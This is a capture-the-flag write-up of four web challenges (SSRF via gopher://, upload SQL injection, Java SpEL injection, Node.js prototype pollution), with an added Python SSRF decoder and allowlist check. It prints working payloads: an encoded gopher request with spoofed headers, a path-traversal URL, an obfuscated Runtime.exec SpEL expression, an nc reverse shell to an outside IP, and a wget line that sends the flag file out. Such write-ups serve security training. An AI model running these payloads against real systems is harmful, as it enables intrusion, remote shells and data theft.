Net Blade Cup (2nd edition, 2022): web

Sign_in

Read /etc/hosts through the file:// protocol to obtain the intranet IP, then probe the intranet host over http://.

Follow the hints: pass the required GET parameter, add the required HTTP headers, and use gopher:// to send the POST data.


http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/%5f%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%74%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%6c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41
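As an added illustration (not part of the original writeup), the Python below shows two things a defender would want for this challenge: a decoder that recovers the HTTP request smuggled inside the gopher:// URL, so a proxy or WAF log can show what was really sent (spoofed X-Forwarded-For, POST body), and the scheme/address allowlist check that the url= fetcher was missing. The sample is the writeup's own payload after the web server's one round of query-string decoding; the function names are mine.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# The writeup's gopher payload as the vulnerable fetcher sees it: the web
# server already decoded the ?url= query parameter once, so one layer of
# percent-encoding remains for curl's gopher handler to strip.
GOPHER_SAMPLE = (
    "gopher://172.73.23.100:80/_POST%20/%3Fa%3D1%20HTTP/1.1%0D%0A"
    "Host%3A172.73.23.100%0D%0A"
    "X-Forwarded-For%3A%20127.0.0.1%0D%0A"
    "X-Originating-IP%3A%20127.0.0.1%0D%0A"
    "X-Remote-IP%3A%20127.0.0.1%0D%0A"
    "X-Remote-Addr%3A%20127.0.0.1%0D%0A"
    "Referer%3A%20bolean.club%0D%0A"
    "Content-type%3A%20application/x-www-form-urlencoded%0D%0A"
    "Content-length%3A%203%0D%0A%0D%0Ab%3D1%0D%0A"
)

ALLOWED_SCHEMES = {"http", "https"}


def decode_gopher_request(url: str) -> str:
    """Return the bytes (as text) a gopher:// fetch writes to the socket:
    the path minus the leading '/' and the item-type byte ('_' here),
    percent-decoded once. Handy for logging what an SSRF really carried."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        raise ValueError("not a gopher URL")
    selector = parts.path[2:]          # drop "/" and the item-type byte
    return unquote(selector)


def is_safe_fetch_target(url: str) -> bool:
    """Allowlist check a URL fetcher should apply before calling curl:
    only http(s), and no literal loopback/private/link-local address.
    A hostname passes here and must be resolved, with every resulting
    address re-checked (not shown). Caveat: the challenge's intranet host
    172.73.23.100 is not RFC 1918 space, so a private-range denylist alone
    would not stop that hop; an allowlist of destination hosts is stronger."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False              # blocks file://, gopher://, dict://, ...
    host = parts.hostname
    if not host:
        return False
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True               # a hostname: resolve-and-check it next
```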

upload

Changing the Content-Type to ctf lets a file with any suffix be uploaded. PHP files are not parsed in the upload directory, but the file name is used in a SQL query and is injectable.

The flag cannot be read by simply guessing the table name and column name.

ez_java

Arbitrary file read: download web.xml, then fetch the servlet class file it references.

http://124.220.9.19:8022//download?filename=../../..//classes/com/abc/servlet/TestServlet.class

It is clearly a SpEL injection.

When the expression is parsed, a second argument, parseContext, of type ParserContext is passed in; it defines the delimiters that mark a SpEL expression (here #{ ... }).

The payload is built with reflection and by splitting the filtered keywords; it successfully pops a calculator locally.

#{
    T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{
    "cmd","/C","calc"})}


For a reverse shell, just URL-encode the payload.


ezjs (post-contest reproduction)

Prototype chain pollution, obvious at a glance. It is actually the thejs challenge from P神's code-breaking puzzles of 2018, with a blacklist added for this challenge.
{"__proto__":{"sourceURL":"\u000aglobal.process.mainModule.constructor._load('child_process').exec('nc 120.27.246.202 8888 -e /bin/sh',function(){});"}}

When I tested this challenge, exec, the space and the semicolon were all filtered.
I am not familiar with JS and did not solve it. After the contest I found that, just as with Python SSTI and SpEL, the keyword filter is bypassed by splitting the string: the space is replaced with $IFS$9, and instead of a semicolon the statement is closed with //.

{
    "__proto__": {
        "sourceURL": "\nglobal.process.mainModule.constructor._load('child_process')['ex'+'ec']('wge'+'t$IFS$9http://vps地址/\u0060ta\\c$IFS$9/.[f]lag\u0060')//"
    }
}


Source: blog.csdn.net/weixin_43610673/article/details/124398704